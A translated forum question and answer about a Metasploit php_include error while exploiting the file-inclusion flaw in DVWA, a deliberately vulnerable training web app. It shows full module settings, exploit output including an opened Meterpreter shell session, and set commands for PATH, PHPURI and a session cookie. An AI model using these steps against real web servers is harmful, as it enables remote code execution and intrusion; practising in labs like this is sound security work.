[英]Metasploit php_include 'undefined method `remove_resource' for nil:NilClass'
我正在嘗試利用dvwa文件包含漏洞。 我指的是本教程: http ://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter
當我運行'exploit'時,出現以下錯誤:[-] Exploit失敗:nil:NilClass的未定義方法`remove_resource'
我設置的選項:
msf exploit(php_include) > show options
Module options (exploit/unix/webapp/php_include):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/david/msf/metasploit-framework/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI /dvwa/vulnerabilities/fi/?page=XXpathXX no The URI to request, with the include parameter changed to XXpathXX
POSTDATA no The POST data to send, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST 172.16.246.131 yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 172.16.246.131 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(php_include) > run
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/ORFRTphN
[*] Local IP: http://10.8.0.10:8080/ORFRTphN
[*] PHP include server started.
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
感謝幫助!
成功利用漏洞后,似乎還會出現此錯誤:
msf exploit(php_include) > exploit
[*] Started reverse handler on 192.168.1.2:443
[*] Using URL: http://192.168.1.2:80/521eNu
[*] PHP include server started.
[*] Sending stage (39848 bytes) to 192.168.1.208
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.208:32887) at 2014-06-01 20:44:15 +0100
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
meterpreter > getuid
Server username: apache (48)
確保正確設置了PATH
和PHPURI
設置。 您可能需要它們如下:
set PATH /dvwa/vulnerabilities/fi
set PHPURI /?page=XXpathXX
與Wireshark確認URL是否按預期發送。
另外,可能是某些出站端口被阻止,因此請嘗試使用不同的值。
在DVWA的特定情況下,您將需要使用HEADERS
參數傳遞會話cookie。 從登錄的瀏覽器會話中獲取此信息,然后進行如下設置:
set HEADERS cookie=PHPSESSIONID=....
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.